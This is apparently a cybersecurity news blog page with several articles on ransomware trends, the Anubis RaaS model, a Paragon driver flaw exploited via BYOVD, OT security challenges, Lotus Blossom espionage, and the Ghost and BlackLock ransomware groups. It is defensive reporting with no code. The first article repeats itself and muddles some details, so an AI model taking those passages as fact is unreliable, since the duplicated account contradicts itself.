Further, turning off IoT devices when not in use can serve as a preventive measure against potential exploitation. To effectively defend against emerging threats, it is imperative to continuously monitor your network and implement robust security frameworks. As demonstrated by the Akira ransomware group, you must monitor your network constantly and implement robust security measures. With ransomware-as-a-service (RaaS) operations continuing to evolve at a rapid pace, organizations must remain vigilant, improving their cybersecurity strategies proactively to remain protected from increasingly sophisticated cyberattacks.
Read more »
Ransomware
ALPHV Blackcat Ransomware Black Basta Cyber Security CyberCrime CyberThreat Global Security Ransomware

Persistent Increase in Ransomware Attacks Raises Global Security Concerns

 


It was concluded that in the first five weeks of 2025, there was a significant increase in ransomware attacks targeted at the United States, marking a nearly 150% increase compared to the first five weeks of 2024. Based on a series of high-profile incidents in which certain organisations decided to pay ransoms to avoid detection, cybercriminals have inadvertently increased their interest in the U.S. and made the country a more attractive target for cybercriminals. 

Consequently, this factor is largely responsible for the increase in ransomware activity in the last few months, as successful ransom payments have likely incentivized other ransomware attacks. In the past year, despite fluctuations in the most active ransomware groups and specific timeframes, the frequency of ransomware incidents in the United States has substantially increased. There has been a significant rise in ransomware incidents since the fall of 2024, and a steady increase has continued into the new year. Security firm NCC Group reports 590 new ransomware victims in January, a 3% increase from the previous month, which already set a record for that period. 

The threat intelligence company Cyble has also identified 518 new victims in January, and this number has increased to 599 within the past 27 days. Approximately two-thirds of the attacks were conducted against organizations located in the United States. Additionally, other cybersecurity monitoring organizations have noted a rise in ransomware incidents over the past two months. The difference in victim counts between cybersecurity firms may be attributed to the difference in methodologies, in particular whether victims of previously compromised cybersecurity systems who have just been revealed should be classified as new victims. 

However, despite these discrepancies, industry experts all agree that ransomware activity has increased in recent months. There are several notable ransomware groups responsible for driving this increase, among which RansomHub, Play, and Akira stand out as prominent threat actors. As a result of their increased activity, organizations across the globe are facing increasing cybersecurity challenges as a result of their increased activities. There is still a persistent threat of ransomware, however, individual ransomware groups emerge and dissipate frequently. 

Some of these groups, such as Black Basta, are now in decline or are nearing obsolescence, while others are suffering disruption due to law enforcement intervention, as LockBit appears to be the case. Groups that suffer from internal conflict, often driven by financial disputes, are prone to collapse. For instance, Alphv, also known as BlackCat, was notorious for conducting an exit scam 12 months ago, retaining the entire $22 million ransom paid by UnitedHealth Group following the Change Healthcare hack, rather than sharing it with the affiliate that carried out the scam. 

Although some ransomware groups have disbanded at the end of last year, the landscape of ransomware continues to be highly dynamic, with new actors continuously emerging. In many instances, these "new" actors are not merely rebranded entities, but individuals already entrenched in the cybercrime ecosystem himself. A significant percentage of these attacks are the result of affiliates, threat actors who work with several ransomware operations. Regardless of which specific group name they operate under, affiliations are responsible for a significant portion of these attacks, according to cybersecurity firm BlackFog. In 2024, 48 new ransomware groups surfaced. 

There are four victims mentioned publicly on RunSomeWare's data leak sites, whereas Linkc only has one victim posted on its data leak site, as reported by threat intelligence firm Cyble. It is unclear how long these emerging groups will survive in this business. In December 2024, Anubis, a Russian-speaking ransomware group that first became active, appears to be the work of former ransomware affiliates, as indicated by the sophistication of its tactics. 

Kela reports that Anubis maintains a presence on cybercrime forums like RAMP and XSS, which reinforces its network within the cybercriminal underground by ensuring it maintains its visibility on these forums. In addition to offering a range of illicit services, this group also operates a traditional ransomware-as-a-service model, where affiliates are rewarded with 80% of the ransom money collected from victims they infect. 

As well as targeting Windows, Linux, network-attached storage (NAS), and ESXi environments, Anubis' ransomware can also be used to spread the virus. In addition, the group maintains a data leak blog based on Tor, where so far only a few people have been listed. The Anubis ransomware operation offers two distinct services in addition to conventional ransomware. In the first case, participants receive 60% of the revenue extorted from victims using stolen data, based on the data-ransom-as-a-service model. If the stolen data are unpublished, have been obtained within the past six months, and considered valuable enough for public exposure, they are eligible for this program. By releasing a press release and notifying local data privacy regulators about the breach, Anubis claims to amplify pressure on victims. 

It is the second offering of Anubis that targets initial access brokers, who facilitate cyber intrusions by selling credentials to compromised networks to gain access to them. Under Anubis' model, the IABs become eligible for 50% of all ransoms demanded by victims whose credentials they have supplied. A specific set of eligibility criteria applies, including being a citizen of the United States, Canada, Europe, or Australia, not having been targeted by another ransomware group within the last 12 months, and not being employed by the government, the educational system, or any non-profit organization. 

Ransomware groups are long collaborating with initial access brokers and have often paid a premium for exclusive access to compromised networks, but the healthcare industry remains a viable target. Cybercrime brokers are increasingly becoming increasingly reliant on each other, and this indicates that their role is growing within the cybercrime economy. According to a recent report by CrowdStrike, access broker activity is expected to grow by almost 50% in 2024, as cybercriminals continue to look for ways of infiltrating high-value targets in an increasingly swift and stealthy manner. 

Despite the persistence of ransomware, it is important to remember that individual ransomware groups emerge and dissipate regularly. Several groups, such as Black Basta, appear to have declined over the years or are on the verge of obsolescence, whereas others, such as LockBit, seem to be facing disruptions because of law enforcement interventions. As it seems with LockBit, these groups collapse in the face of internal conflicts, often caused by financial disagreements. Alphv, also known as BlackCat, is one example that exemplifies an exit scam that was carried out 12 months ago. 

According to reports, Alphv kept the entire $22 million ransom paid by UnitedHealth Group to resolve the Change Healthcare breach, instead of sharing it with the affiliate that perpetrated the attack. It is important to note that while some groups have disbanded, the ransomware landscape still remains a highly dynamic place, with new actors constantly emerging on the scene. The so-called "new" groups are usually nothing more than rebranded entities that already have a place in the cybercrime ecosystem. 

These so-called "new" groups include individuals already well versed in the criminality ecosystem. Affiliates - threats actors who collaborate with multiple ransomware operations - are responsible for a significant portion of these attacks, regardless of who they use as their operating name. In 2024, 48 new ransomware groups were discovered, according to cybersecurity firm BlackFog. RunSomeWares claims to have identified four victims on their data leak site which has been compiled by Linkc, while only one victim has been identified by RunSomeWares, according to threat intelligence firm Cyble. However, the long term viability of these emerging groups is uncertain. 

As indicated by the sophistication of the attacks of Anubis, a Russian-speaking ransomware group that became active by December 2024, its tactics were likely developed by former ransomware affiliates. Anubis maintained a visible presence, according to threat intelligence firm Kela, on cybercrime forums such as RAMP and XSS, thereby enhancing its connections within the black market for cybercrime. The group offers a range of illicit services to its customers. There are two main models of ransomware-as-a-service (RaaS) that the organization uses, in which affiliates receive 80% of any ransom payments that are collected from victims that are infected by the group. 

The ransomware of Anubis is capable of attacking Windows, Linux, network-attached storage (NAS), and ESXi environments, as well. Furthermore, the group maintains a Tor-based blog that leaks data, but so far, it has only listed a few victims that have been affected. It advertises two distinctive services in addition to conventional ransomware. The first is a model called data-ransom-as-a-service (DraaS), in which participants receive 60% of all the revenue extorted from victims by using stolen data. 

To qualify, the stolen data must not have been published, must have been obtained within the last six months, and should be considered valuable enough to be published. In its second offering, Anubis claims that publicizing the data breach and notifying local data privacy regulators will increase pressure on victims. The offering targets initial access brokers (IABs) who facilitate cyber intrusions by selling access credentials to compromised networks. Under Anubis' model, it will award half of the ransom obtained from victims who provide their access credentials to the IAB, which will be used to secure a ransom. 

It is important to note, however, that there are some eligibility requirements for this program. The victim must reside in the United States, Canada, Europe, or Australia, and not have been targeted by another ransomware group in the past 12 months. The victim must also not be a government or educational employee. It is, however, still very possible to target the healthcare industry. 

A long history of ransomware groups collaborating with initial access brokers has shown that these brokers often pay a premium for exclusive access to compromised networks. Their increasing dependence on these brokers indicates that their role within the cybercrime economy is growing. According to a recent report published by CrowdStrike, access broker activity increased by nearly 50% in 2024 compared to the previous year, as cybercriminals continued to search for faster and stealthier methods of infiltrating high-value targets as they continued to grow.
Read more »
Ransomware
Cyber Attacks Hackers Microsoft Paragon Software Ransomware

Hackers Exploit Flaw in Microsoft-Signed Driver to Launch Ransomware Attacks

 



Cybercriminals are exploiting a vulnerability in a Microsoft-signed driver developed by Paragon Software, known as BioNTdrv.sys, to carry out ransomware attacks. This driver, part of Paragon Partition Manager, is typically used to manage hard drive space, but hackers have found a way to misuse it for malicious purposes.  


How the Attack Works  

The vulnerability, identified as CVE-2025-0289, allows attackers to use a technique called "bring your own vulnerable driver" (BYOVD). This means they introduce the legitimate but flawed driver into a system and exploit it to gain high-level access. Once they obtain SYSTEM-level privileges, they can execute ransomware, steal data, or disable security software without being detected.  

The alarming part is that the vulnerability can be exploited even on devices that do not have Paragon Partition Manager installed, as long as the driver exists on the system.  


Other Vulnerabilities  

Researchers also found four additional flaws in the driver:  

1. CVE-2025-0288: Allows access to kernel memory, helping attackers gain control.  

2. CVE-2025-0287: Can crash the system using a null pointer error.  

3. CVE-2025-0286: Enables attackers to execute malicious code in kernel memory.  

4. CVE-2025-0285: Allows manipulation of kernel memory, escalating control. 


Response from Microsoft and Paragon  

Microsoft confirmed that hackers are already using this flaw to spread ransomware and has responded by blocking the vulnerable driver through its Vulnerable Driver Blocklist. Meanwhile, Paragon Software has released a security patch and advised users to update their drivers immediately to avoid potential risks.  


How to Stay Safe  

To protect your system from these attacks:  

1. Update your drivers from Paragon Software to the latest version.  

2. Install Windows security updates regularly.  

3. Use reliable antivirus software to detect suspicious activities.  

4. Monitor your system for unexpected crashes or slow performance.    

While Microsoft and Paragon Software have taken steps to contain the damage, users must stay proactive in securing their systems through regular updates and vigilant monitoring.

Read more »
Threat Detection
Compliance Cyber Security Cybersecurity Data Breach Network Security OT security Ransomware Threat Detection

Cybersecurity Threats Are Evolving: Seven Key OT Security Challenges

 

Cyberattacks are advancing rapidly, threatening businesses with QR code scams, deepfake fraud, malware, and evolving ransomware. However, strengthening cybersecurity measures can mitigate risks. Addressing these seven key OT security challenges is essential.

Insurance broker Howden reports that U.K. businesses lost $55 billion to cyberattacks in five years. Basic security measures could save $4.4 million over a decade, delivering a 25% ROI.

Experts at IDS-INDATA warn that outdated OT systems are prime hacker entry points, with 60% of breaches stemming from unpatched systems. Research across industries identifies seven major OT security challenges.

Seven Critical OT Security Challenges

1. Ransomware & AI-Driven Attacks
Ransomware-as-a-Service and AI-powered malware are escalating threats. “The speed at which attack methods evolve makes waiting to update your defences risky,” says Ryan Cooke, CISO at IDS-INDATA. Regular updates and advanced threat detection systems are vital.

2. Outdated Systems & Patch Gaps
Many industrial networks rely on legacy systems. “We know OT is a different environment from IT,” Cooke explains. Where patches aren’t feasible, alternative mitigation is necessary. Regular audits help address vulnerabilities.

3. Lack of OT Device Visibility
Limited visibility makes networks vulnerable. “Without visibility over your connected OT devices, it’s impossible to secure them,” says Cooke. Asset discovery tools help monitor unauthorized access.

4. Growing IoT Complexity
IoT expansion increases security risks. “As more IoT and smart devices are integrated into industrial networks, the complexity of securing them grows exponentially,” Cooke warns. Prioritizing high-risk devices is essential.

5. Financial & Operational Risks
Breaches can cause financial losses, production shutdowns, and life-threatening risks. “A breach in OT environments can cause financial loss, shut down entire production lines, or, in extreme cases, endanger lives,” Cooke states. A strong incident response plan is crucial.

6. Compliance with Evolving Regulations
Non-compliance with OT security regulations leads to financial penalties. Regular audits ensure adherence and minimize risks.

7. Human Error & Awareness Gaps
Misconfigured security settings remain a major vulnerability. “Investing in cybersecurity awareness training for your OT teams is critical,” Cooke advises. Security training and monitoring help prevent insider threats.

“Proactively addressing these points will help significantly reduce the risk of compromise, protect critical infrastructure, ensure compliance, and safeguard against potentially severe disruptions,” Cooke concluded. 

Moreover, cyberattacks will persist regardless, but proactively addressing these challenges significantly improves the chances of defending against them.
Read more »
Ransomware
cyberattacks trending news Cybersecurity Attack malware News Ransomware

Cisco Talos Uncovers Lotus Blossom’s Multi-Campaign Cyber Espionage Operations

Cisco Talos has uncovered a series of cyber espionage campaigns attributed to the advanced persistent threat (APT) group Lotus Blossom, also known as Spring Dragon, Billbug, and Thrip. 

The group has been active since at least 2012, targeting government, manufacturing, telecommunications, and media sectors in regions such as the Philippines, Vietnam, Hong Kong, and Taiwan. Talos identified Sagerunex, a backdoor tool used exclusively by Lotus Blossom, as the core malware in these campaigns. 

The investigation revealed multiple variants of Sagerunex, evolving from its original form to leverage third-party cloud services such as Dropbox, Twitter, and Zimbra webmail as command-and-control (C2) tunnels, instead of traditional Virtual Private Servers (VPS). This shift helps the group evade detection while maintaining control over infected endpoints. 

The group has been observed gaining persistence on compromised systems by embedding Sagerunex into the system registry and configuring it to run as a service. The malware operates as a dynamic link library (DLL), executed directly in memory to avoid detection. The campaigns also showcase long-term persistence strategies, allowing attackers to remain undetected for months. 

Beyond Sagerunex, Lotus Blossom employs an arsenal of hacking tools to facilitate credential theft, privilege escalation, and data exfiltration. These include a Chrome cookie stealer from GitHub, a customized Venom proxy tool, a privilege adjustment tool, and an archiving tool for encrypting and stealing data. 

Additionally, the group utilizes mtrain V1.01, a modified HTran proxy relay tool, to route connections between compromised machines and external networks. The attack chain follows a structured multi-stage approach, starting with reconnaissance commands such as “net,” “tasklist,” “ipconfig,” and “netstat” to gather system details. 

If an infected machine lacks direct internet access, the attackers leverage proxy settings or the Venom tool to establish connectivity. A notable tactic involves storing malicious tools in the “public\pictures” subfolder, a non-restricted directory, to avoid detection.

Talos’ research underscores the growing sophistication of Lotus Blossom, which continues to refine its techniques and expand its capabilities. With high confidence, Cisco attributes these campaigns to Lotus Blossom, highlighting its sustained cyber espionage operations against high-value targets.
Read more »
Software
Cyber Security FBI Ghost Ransomware Software

FBI Warns: ‘Ghost’ Ransomware Is Spreading— Here’s How to Stay Safe

 


The Federal Bureau of Investigation (FBI) has released an urgent alert about a growing cyber threat known as Ghost ransomware. This group has been attacking various organizations across more than 70 countries, locking victims out of their own systems and demanding payment to restore access. In response, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) have advised businesses and individuals to back up their data and strengthen their cybersecurity measures to prevent potential attacks.  


Who Is Behind the Ghost Ransomware?  

The Ghost ransomware group is a team of cybercriminals that use ransomware to encrypt data, making it unusable unless a ransom is paid. Unlike other hacking groups that trick people into clicking on harmful links or sharing personal information (phishing attacks), Ghost takes a different approach. They exploit security flaws in outdated software and hardware to break into systems without needing victims to take any action.  

Cybersecurity experts believe that Ghost operates from China and has used multiple names over time, including Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. These different names suggest the group has been active for a long time and may have carried out various attacks under different identities.  


How Does Ghost Ransomware Work?  

Since early 2021, Ghost ransomware has been targeting systems with outdated software and firmware. The hackers search for weaknesses in these systems and use publicly available hacking tools to gain access and install ransomware. Once inside, they encrypt important files and demand payment to unlock them.  

The FBI has identified several ransomware files linked to Ghost, including Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe. These files have been used to lock data in critical industries such as healthcare, education, government services, manufacturing, technology, and small businesses. The impact has been severe, affecting essential services and causing financial losses.  


How to Stay Protected from Ghost Ransomware

The FBI has recommended several security steps to reduce the risk of being attacked:  

1. Create Secure Backups: Keep offline backups of important data so that even if ransomware encrypts your files, you can restore them without paying a ransom. Many organizations that had proper backups were able to recover quickly.  

2. Update Software and Firmware: Hackers often target outdated programs with security flaws. Ensure that your operating system, applications, and firmware are regularly updated with the latest security patches.  

3. Recognize Cyber Threats: While Ghost does not typically use phishing, it is still essential to train employees and individuals to identify suspicious activity and avoid downloading unknown files or clicking on unverified links.  

4. Monitor Network Activity: Keep an eye on unusual behavior in your network, such as unexpected logins, file modifications, or unauthorized access. Detecting an attack early can help prevent major damage.  


Cyber threats like Ghost ransomware continue to evolve, but staying informed and taking these preventive measures can help reduce the risk of falling victim to an attack. The FBI urges everyone to act now and secure their data before it’s too late.


Read more »
Windows
BlackLock Cyber Attacks Linux Ransomware Windows

BlackLock Ransomware: The Fastest-Growing Cyber Threat and How to Stay Safe

 



Ransomware remains a major problem for businesses, and a new cybercriminal group is expanding at an alarming rate. Security researchers at ReliaQuest have identified BlackLock as the fastest-growing ransomware operation today, with its activity increasing by 1,425% since late 2024. Although it is currently the seventh most active ransomware group, experts predict it could become the biggest threat in 2025.  

Despite law enforcement cracking down on major ransomware gangs like LockBit in 2024, the number of cyberattacks continues to grow. A report from January 31 suggested ransomware incidents had risen by 15% compared to the previous year. However, a February 20 study by Symantec showed a slower increase of just 3%. No matter the rate, the takeaway is the same, ransomware remains a serious risk.  


How BlackLock Ransomware Operates  

BlackLock ransomware is designed to infect Windows, Linux, and VMware ESXi systems, making it a versatile and dangerous threat. Cybercriminals behind this operation have developed unique methods to pressure victims into paying ransom quickly.  


1. Blocking access to stolen data  

  • Ransomware groups often leak stolen information on dark web sites to force victims to pay.  
  • BlackLock makes it harder for victims and cybersecurity teams to access leaked data by blocking repeated download attempts.  
  • If someone tries to retrieve files too often, they either receive no response or only see empty files with contact details instead of real data.  
  • This tactic prevents companies from fully understanding what was stolen, increasing the likelihood of paying the ransom.  


2. Recruiting criminals to assist with attacks  

  • BlackLock actively hires "traffers," cybercriminals who help spread ransomware by tricking people into downloading malware.  
  • These traffers guide victims toward fake websites or malicious links that install ransomware.  
  • The group openly recruits low-level hackers on underground forums, while more skilled cybercriminals are privately contacted for higher-level roles.  


Steps to Protect Your Systems  

Security experts recommend taking immediate action to strengthen defenses, especially for companies using VMware ESXi servers. Here are some key steps:  

1. Turn off unnecessary services  

  • Disable unused features like vMotion and SNMP to reduce possible entry points for attackers.  

2. Strengthen security restrictions  

  •  Configure VMware ESXi hosts to only allow management through vCenter, making it harder for hackers to exploit weaknesses.  

3. Limit network access  

  •  Use firewalls and strict access controls to prevent unauthorized users from reaching sensitive systems.  

Additional recommendations include:  

1. Activating multi-factor authentication (MFA) to prevent unauthorized logins.  

2. Disabling Remote Desktop Protocol (RDP) on systems that do not need remote access.  

The rapid rise of BlackLock ransomware shows that cybercriminals ar constantly developing new strategies to pressure victims and avoid detection. Organizations must take proactive steps to secure their networks and stay informed about emerging threats. Implementing strong security controls today can prevent costly cyberattacks in the future.

Read more »
Subscribe to: Posts (Atom)